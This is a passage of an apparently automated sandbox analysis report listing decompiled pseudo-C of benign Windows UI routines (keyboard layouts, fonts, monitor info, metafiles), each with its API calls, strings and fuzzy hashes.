						_t99 =  *((intOrPtr*)(_t118 + 0x30));
						if(_t99 == 0) {
							break;
						}
						_t118 = _t99;
					}
					_v24 = E0044D590(_t118);
					goto L6;
				}
			}

0x0044467c
0x00444685
0x00444687
0x00444696
0x00444698
0x0044469e
0x004446a3
0x004446ae
0x004446d7
0x004446db
0x0044480a
0x00444813
0x00444813
0x004446e1
0x004446e7
0x004446e7
0x004446ec
0x00000000
0x00000000
0x004446e5
0x004446e5
0x004446f5
0x004446f7
0x004446fd
0x00000000
0x00000000
0x00444706
0x00444709
0x0044470e
0x0044472f
0x00444732
0x0044473d
0x0044473f
0x00444751
0x00444753
0x00444741
0x00444744
0x0044474c
0x0044474c
0x00444756
0x00444756
0x0044475a
0x00444760
0x00444766
0x00444778
0x0044477d
0x00444781
0x00000000
0x00000000
0x0044478f
0x0044479a
0x0044479f
0x004447af
0x004447b4
0x004447b9
0x004447c6
0x004447f1
0x00444804
0x00444806
0x00444806
0x00000000
0x00444804
0x004447c8
0x004447d7
0x00000000
0x00000000
0x004447d9
0x004447ef
0x00000000
0x00000000
0x00000000
0x004447ef
0x00444713
0x00444719
0x00444719
0x0044471e
0x00000000
0x00000000
0x00444717
0x00444717
0x00444727
0x00000000
0x00444727
0x004446b8
0x004446bc
0x00000000
0x004446c2
0x004446c6
0x004446c6
0x004446cb
0x00000000
0x00000000
0x004446c4
0x004446c4
0x004446d4
0x00000000
0x004446d4

APIs

Part of subcall function 00444ACC: WindowFromPoint.USER32 ref: 00444AD2
Part of subcall function 00444ACC: GetParent.USER32(00000000), ref: 00444AE9

GetWindow.USER32(00000000,00000004), ref: 0044469E
GetCurrentThreadId.KERNEL32(00444610,?,00000000,00000004,?,-0000000C,?), ref: 00444772
EnumThreadWindows.USER32 ref: 00444778
GetWindowRect.USER32 ref: 0044478F
IntersectRect.USER32(?,?,?), ref: 004447FD

Part of subcall function 00443B88: GetWindowThreadProcessId.USER32(00000000), ref: 00443B95
Part of subcall function 00443B88: GetCurrentProcessId.KERNEL32(?,?,00000000,004670B7,?,?,0049FF87,00000001,00467223,?,?,?,0049FF87), ref: 00443B9E
Part of subcall function 00443B88: GlobalFindAtomA.KERNEL32(00000000), ref: 00443BB3
Part of subcall function 00443B88: GetPropA.USER32(00000000,00000000), ref: 00443BCA

Strings

p,D, xrefs: 00444732

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
String ID: p,D
API String ID: 2202917067-3811598181
Opcode ID: af91288101caf2111d745621aaf0fcdae1df4e1378772dab820cd0a8c6ece8f7
Instruction ID: b5b42182e1fd4ed5cca896d269ba601e5c7f096501766987c8208bf9843cb462
Opcode Fuzzy Hash: af91288101caf2111d745621aaf0fcdae1df4e1378772dab820cd0a8c6ece8f7
Instruction Fuzzy Hash: CC518F75A002099FDB10DF69C880BAEB7F4AF49358F1185A6F814EB351D738ED41CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00465144, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 125
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00465144(intOrPtr __eax, void* __ebx, void* __fp0) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				struct HKL__* _v280;
				char _v536;
				char _v600;
				char _v604;
				intOrPtr _v608;
				char _v612;
				void* _t60;
				intOrPtr _t106;
				intOrPtr _t111;
				void* _t117;
				void* _t118;
				intOrPtr _t119;
				void* _t129;

				_t129 = __fp0;
				_t117 = _t118;
				_t119 = _t118 + 0xfffffda0;
				_v612 = 0;
				_v8 = __eax;
				_push(_t117);
				_push(0x4652ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				if( *((intOrPtr*)(_v8 + 0x34)) != 0) {
					L11:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(0x4652f6);
					return E004043D8( &_v612);
				} else {
					 *((intOrPtr*)(_v8 + 0x34)) = E004035DC(1);
					E004043D8(_v8 + 0x38);
					_t60 = GetKeyboardLayoutList(0x40,  &_v280) - 1;
					if(_t60 < 0) {
						L10:
						 *((char*)( *((intOrPtr*)(_v8 + 0x34)) + 0x1d)) = 0;
						E0041EE18( *((intOrPtr*)(_v8 + 0x34)), 1);
						goto L11;
					} else {
						_v20 = _t60 + 1;
						_v24 =  &_v280;
						do {
							if(E0045236C( *_v24) == 0) {
								goto L9;
							} else {
								_v608 =  *_v24;
								_v604 = 0;
								if(RegOpenKeyExA(0x80000002, E00409AF4( &_v600, "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x", _t129, 0), 0, 0x20019,  &_v16) != 0) {
									goto L9;
								} else {
									_push(_t117);
									_push(0x4652ab);
									_push( *[fs:eax]);
									 *[fs:eax] = _t119;
									_v12 = 0x100;
									if(RegQueryValueExA(_v16, "layout text", 0, 0,  &_v536,  &_v12) == 0) {
										E00404648( &_v612, 0x100,  &_v536);
										 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x34)))) + 0x3c))();
										if( *_v24 ==  *((intOrPtr*)(_v8 + 0x3c))) {
											E00404648(_v8 + 0x38, 0x100,  &_v536);
										}
									}
									_pop(_t111);
									 *[fs:eax] = _t111;
									_push(0x4652b2);
									return RegCloseKey(_v16);
								}
							}
							goto L12;
							L9:
							_v24 = _v24 + 4;
							_t38 =  &_v20;
							 *_t38 = _v20 - 1;
						} while ( *_t38 != 0);
						goto L10;
					}
				}
				L12:
			}

0x00465144
0x00465145
0x00465147
0x00465150
0x00465156
0x0046515b
0x0046515c
0x00465161
0x00465164
0x0046516e
0x004652d0
0x004652d8
0x004652db
0x004652de
0x004652ee
0x00465174
0x00465183
0x0046518c
0x0046519f
0x004651a2
0x004652bf
0x004652c5
0x004652cb
0x00000000
0x004651a8
0x004651a9
0x004651b2
0x004651b5
0x004651c1
0x00000000
0x004651c7
0x004651d9
0x004651df
0x00465209
0x00000000
0x0046520f
0x00465211
0x00465212
0x00465217
0x0046521a
0x0046521d
0x00465243
0x00465256
0x0046526e
0x0046527c
0x0046528f
0x0046528f
0x0046527c
0x00465296
0x00465299
0x0046529c
0x004652aa
0x004652aa
0x00465209
0x00000000
0x004652b2
0x004652b2
0x004652b6
0x004652b6
0x004652b6
0x00000000
0x004651b5
0x004651a2
0x00000000

APIs

GetKeyboardLayoutList.USER32 ref: 0046519A
RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 00465202
RegQueryValueExA.ADVAPI32 ref: 0046523C
RegCloseKey.ADVAPI32(?), ref: 004652A5

Strings

layout text, xrefs: 00465233
System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 004651EC

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseKeyboardLayoutListOpenQueryValue
String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
API String ID: 1703357764-2652665750
Opcode ID: 3940b42a791a8552de3f400cabc1f3b843bd877f3a4243fd0161efd17219e14d
Instruction ID: 32a58f5764b6592b7ec644c283c30acf271b0238de0e9c0c279c6990dafe81c7
Opcode Fuzzy Hash: 3940b42a791a8552de3f400cabc1f3b843bd877f3a4243fd0161efd17219e14d
Instruction Fuzzy Hash: 1A416974A006099FDB10DF95C991B9EB7F8EB48304FA140E6E904E7391E778AE40CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0042C28C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0042C28C(void* __eax, void* __edx) {
				BYTE* _v8;
				int _v12;
				struct HDC__* _v16;
				short _v18;
				signed int _v24;
				short _v26;
				short _v28;
				char _v38;
				void* __ebx;
				void* __ebp;
				signed int _t35;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t78;
				void* _t81;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				_t84 = _t86;
				_t87 = _t86 + 0xffffffdc;
				_t81 = __edx;
				_t66 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) == 0) {
					return __eax;
				} else {
					E00402FB0( &_v38, 0x16);
					_t68 =  *((intOrPtr*)(_t66 + 0x28));
					_v38 = 0x9ac6cdd7;
					_t35 =  *((intOrPtr*)(_t68 + 0x18));
					if(_t35 != 0) {
						_v24 = _t35;
					} else {
						_v24 = 0x60;
					}
					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
					_v18 = E0042A63C( &_v38);
					_v16 = GetDC(0);
					_push(_t84);
					_push(0x42c3c7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
					_v8 = E00402AE4(_v12, 0, 0x16);
					_push(_t84);
					_push(0x42c3a7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t87;
					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
						E0042982C(_t68);
					}
					E0041F138(_t81, 0x16,  &_v38);
					E0041F138(_t81, _v12, _v8);
					_pop(_t78);
					 *[fs:eax] = _t78;
					_push(0x42c3ae);
					return E00402B14(_v8);
				}
			}

0x0042c28d
0x0042c28f
0x0042c294
0x0042c296
0x0042c29c
0x0042c3d3
0x0042c2a2
0x0042c2ac
0x0042c2b1
0x0042c2b4
0x0042c2bb
0x0042c2c2
0x0042c2cc
0x0042c2c4
0x0042c2c4
0x0042c2c4
0x0042c2e3
0x0042c2fa
0x0042c306
0x0042c311
0x0042c316
0x0042c317
0x0042c31c
0x0042c31f
0x0042c335
0x0042c340
0x0042c345
0x0042c346
0x0042c34b
0x0042c34e
0x0042c36b
0x0042c36d
0x0042c36d
0x0042c37c
0x0042c389
0x0042c390
0x0042c393
0x0042c396
0x0042c3a6
0x0042c3a6

APIs

MulDiv.KERNEL32 ref: 0042C2DE
MulDiv.KERNEL32 ref: 0042C2F5
GetDC.USER32(00000000), ref: 0042C30C
GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?), ref: 0042C330
GetWinMetaFileBits.GDI32(?,?,?,00000008,?), ref: 0042C363

Strings

`, xrefs: 0042C2C4

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: BitsFileMeta
String ID: `
API String ID: 858000408-2679148245
Opcode ID: c2876821db35264e58642f0b4257e84df2083e223ced9104b27bbf2a6ebd2475
Instruction ID: 7a00dac7b19b6f066b125360e2b75f073ca423e1ecba561980a79504bd7ac281
Opcode Fuzzy Hash: c2876821db35264e58642f0b4257e84df2083e223ced9104b27bbf2a6ebd2475
Instruction Fuzzy Hash: 7831A775B00208ABDB00DFD5D881AAEB7B8EF09710F5144A6FD04FB281D6799E11D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00465498, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00465498(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x4bcb7c != 0) {
					_t54 =  *0x4bcb7c; // 0x1c41284
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x4655dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x4bcb7c != 0) {
					_t52 =  *0x4bcb7c; // 0x1c41284
					E00467ACC(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0042864C( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65);
					_t6 = _t57 + 0x84; // 0x38004010
					E0042864C( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				if(SystemParametersInfoA(0x29, 0,  &_v405, 0) == 0) {
					_t14 = _t57 + 0x80; // 0xe8000000
					E00428730( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0042864C( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0xe8000000
					E0042864C( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0042864C( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0xe8000000
				E00428490( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E00428490( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x4655e4);
				if( *0x4bcb7c != 0) {
					_t38 =  *0x4bcb7c; // 0x1c41284
					return E00467ACC(_t38, _v5);
				}
				return 0;
			}

0x00465498
0x00465499
0x0046549b
0x004654a2
0x004654a4
0x004654af
0x004654b1
0x004654bc
0x004654bc
0x004654c1
0x004654c2
0x004654c7
0x004654ca
0x004654d4
0x004654d8
0x004654dd
0x004654dd
0x004654f3
0x0046550f
0x00465516
0x0046551c
0x004654f5
0x004654f9
0x00465500
0x00465506
0x00465506
0x00465521
0x0046553f
0x00465575
0x00465580
0x00465587
0x0046558e
0x00465594
0x00465541
0x00465548
0x0046554f
0x00465555
0x00465561
0x00465568
0x0046556e
0x0046556e
0x00465599
0x004655a4
0x004655a9
0x004655b4
0x004655be
0x004655c1
0x004655cd
0x004655d2
0x00000000
0x004655d7
0x004655dc

APIs

SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004654EC
CreateFontIndirectA.GDI32(?), ref: 004654F9
GetStockObject.GDI32(0000000D), ref: 0046550F

Part of subcall function 00428730: MulDiv.KERNEL32 ref: 0042873D

SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00465538
CreateFontIndirectA.GDI32(?), ref: 00465548
CreateFontIndirectA.GDI32(?), ref: 00465561
GetStockObject.GDI32(0000000D), ref: 00465587

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem
String ID:
API String ID: 2891467149-0
Opcode ID: 197793e789b355ee09b14fd3a8cc8c79d52eebfba29a54b9cc7f2a23b13e6e63
Instruction ID: 0f2b3b07d933e9619f7380dc23c3e3438e4ecac46f2b85bfedb5d5816808db95
Opcode Fuzzy Hash: 197793e789b355ee09b14fd3a8cc8c79d52eebfba29a54b9cc7f2a23b13e6e63
Instruction Fuzzy Hash: AC31D930704204ABE750FB79DC82B9D37A5AB44304F54807BB948DB396EE7C9805CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00455B00, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 80
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00455B00(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr _t9;
				void* _t11;
				intOrPtr _t17;
				void* _t28;
				void* _t29;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t41;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t46;

				_t45 = _t46;
				_push(_t29);
				_push(__ebx);
				_t43 = __edx;
				_t28 = __eax;
				if( *0x4bcb64 == 0) {
					 *0x4bcb64 = E0040D364("comctl32.dll", __eax, _t29);
					if( *0x4bcb64 >= 0x60000) {
						_t41 = GetModuleHandleA("comctl32.dll");
						if(_t41 != 0) {
							 *0x4bcb68 = GetProcAddress(_t41, "ImageList_WriteEx");
						}
					}
				}
				_v8 = E00425AD4(_t43, 1, 0);
				_push(_t45);
				_push(0x455bfa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46;
				if( *0x4bcb68 == 0) {
					_t9 = _v8;
					if(_t9 != 0) {
						_t9 = _t9 - 0xffffffec;
					}
					_push(_t9);
					_t11 = E004546DC(_t28);
					_push(_t11);
					L0042FD68();
					if(_t11 == 0) {
						_t33 =  *0x4baeb8; // 0x4263fc
						E0040CB80(_t33, 1);
						E00403DEC();
					}
				} else {
					_t17 = _v8;
					if(_t17 != 0) {
						_t17 = _t17 - 0xffffffec;
					}
					_push(_t17);
					_push(1);
					_push(E004546DC(_t28));
					if( *0x4bcb68() != 0) {
						_t34 =  *0x4baeb8; // 0x4263fc
						E0040CB80(_t34, 1);
						E00403DEC();
					}
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x455c01);
				return E0040360C(_v8);
			}

0x00455b01
0x00455b03
0x00455b04
0x00455b07
0x00455b09
0x00455b12
0x00455b1e
0x00455b2d
0x00455b39
0x00455b3d
0x00455b4a
0x00455b4a
0x00455b3d
0x00455b2d
0x00455b5f
0x00455b64
0x00455b65
0x00455b6a
0x00455b6d
0x00455b77
0x00455bb1
0x00455bb6
0x00455bb8
0x00455bb8
0x00455bbb
0x00455bbe
0x00455bc3
0x00455bc4
0x00455bcb
0x00455bcd
0x00455bda
0x00455bdf
0x00455bdf
0x00455b79
0x00455b79
0x00455b7e
0x00455b80
0x00455b80
0x00455b83
0x00455b84
0x00455b8d
0x00455b96
0x00455b98
0x00455ba5
0x00455baa
0x00455baa
0x00455b96
0x00455be6
0x00455be9
0x00455bec
0x00455bf9

APIs

Part of subcall function 0040D364: 73211C9C.VERSION(00000000,?,00000000,0040D43A), ref: 0040D3A6
Part of subcall function 0040D364: 73211CED.VERSION(00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3DB
Part of subcall function 0040D364: 73211B72.VERSION(?,0040D44C,?,?,00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3F5

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00455B34
GetProcAddress.KERNEL32(00000000,ImageList_WriteEx,comctl32.dll), ref: 00455B45
73F66DBD.COMCTL32(00000000,?,00000000,00455BFA), ref: 00455BC4

Strings

ImageList_WriteEx, xrefs: 00455B3F
comctl32.dll, xrefs: 00455B2F
comctl32.dll, xrefs: 00455B14

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: 73211$AddressHandleModuleProc
String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
API String ID: 2983770667-3125200627
Opcode ID: 0e8971f3872d7cf69b3e185884f1fff5c021e66f0f65a354f811e2e6d261d0e9
Instruction ID: 7a979c24bf6d79b10fc0f01f6174f2a17f9497eddf0375a88709807080ad289e
Opcode Fuzzy Hash: 0e8971f3872d7cf69b3e185884f1fff5c021e66f0f65a354f811e2e6d261d0e9
Instruction Fuzzy Hash: E3219570704A009BD714EF75EDAAB7A76A99B44B19B10013BFC01D73A2DA7DBC48C61D

Uniqueness

Uniqueness Score: -1.00%

Function 004301C8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E004301C8(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x4bc931 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406CD4();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x4bc918; // 0x4301c8
					 *0x4bc918 = E0042FDB8(5, _t23, "GetMonitorInfoA", _t26, _t29);
					_t24 =  *0x4bc918(_t27, _t29);
				}
				return _t24;
			}

0x004301d1
0x004301d4
0x004301de
0x00430203
0x0043020b
0x0043022b
0x00430230
0x0043023b
0x00430246
0x00430250
0x00430251
0x00430252
0x00430253
0x00430254
0x00430255
0x0043025f
0x00430261
0x00430269
0x0043026a
0x0043026a
0x0043026f
0x0043026f
0x004301e0
0x004301e5
0x004301f2
0x004301ff
0x004301ff
0x00430279

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00430220
GetSystemMetrics.USER32 ref: 00430235
GetSystemMetrics.USER32 ref: 00430240
lstrcpy.KERNEL32 ref: 0043026A

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

Strings

DISPLAY, xrefs: 00430261
GetMonitorInfoA, xrefs: 004301E0

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 5d7acdd16e0bc1ad2a849c78d3370ffc818a1f3e2c50f723f1c29fd45b8223ab
Instruction ID: 778f1a88cd6496855ded8dc2a594a789e4854bf79e375633c516c23e18d0b801
Opcode Fuzzy Hash: 5d7acdd16e0bc1ad2a849c78d3370ffc818a1f3e2c50f723f1c29fd45b8223ab
Instruction Fuzzy Hash: 49110375A01304AFEB20CF689CC8BA7B7E8EF09710F00063AE955A7251D3B4AC4087A8

Uniqueness

Uniqueness Score: -1.00%

Function 0043029C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0043029C(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x4bc932 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *((intOrPtr*)(_t29 + 8)) = 0;
						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406CD4();
						}
						_t24 = 1;
					}
				} else {
					_t26 =  *0x4bc91c; // 0x43029c
					 *0x4bc91c = E0042FDB8(6, _t23, "GetMonitorInfoW", _t26, _t29);
					_t24 =  *0x4bc91c(_t27, _t29);
				}
				return _t24;
			}

0x004302a5
0x004302a8
0x004302b2
0x004302d7
0x004302df
0x004302ff
0x00430304
0x0043030f
0x0043031a
0x00430324
0x00430325
0x00430326
0x00430327
0x00430328
0x00430329
0x00430333
0x00430335
0x0043033d
0x0043033e
0x0043033e
0x00430343
0x00430343
0x004302b4
0x004302b9
0x004302c6
0x004302d3
0x004302d3
0x0043034d

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004302F4
GetSystemMetrics.USER32 ref: 00430309
GetSystemMetrics.USER32 ref: 00430314
lstrcpy.KERNEL32 ref: 0043033E

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

Strings

DISPLAY, xrefs: 00430335
GetMonitorInfoW, xrefs: 004302B4

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: d6540120b03763d89d3505b817fe88370fcbab0dfc7e112a9e46c7f4792aadd8
Instruction ID: af960cf9f872d7ed926445b6a3aa41c5da80037a6bffc8b5ee27f2ab9e0b3b9d
Opcode Fuzzy Hash: d6540120b03763d89d3505b817fe88370fcbab0dfc7e112a9e46c7f4792aadd8
Instruction Fuzzy Hash: 4611D671A017049FE7608F619CC5BA7B7E8EF09310F10463BED599B291D778A904CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042C910, Relevance: 10.6, APIs: 7, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042C910(int __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				void* _v20;
				struct tagRGBQUAD _v1044;
				int _t16;
				int _t37;
				intOrPtr _t44;
				void* _t46;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t16 = __eax;
				_t49 = _t51;
				_t52 = _t51 + 0xfffffbf0;
				_v8 = __edx;
				_t46 = __eax;
				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
					L4:
					return _t16;
				} else {
					_t16 = E0042A074(_v8, 0xff,  &_v1044);
					_t37 = _t16;
					if(_t37 == 0) {
						goto L4;
					} else {
						_v12 = GetDC(0);
						_v16 = CreateCompatibleDC(_v12);
						_v20 = SelectObject(_v16, _t46);
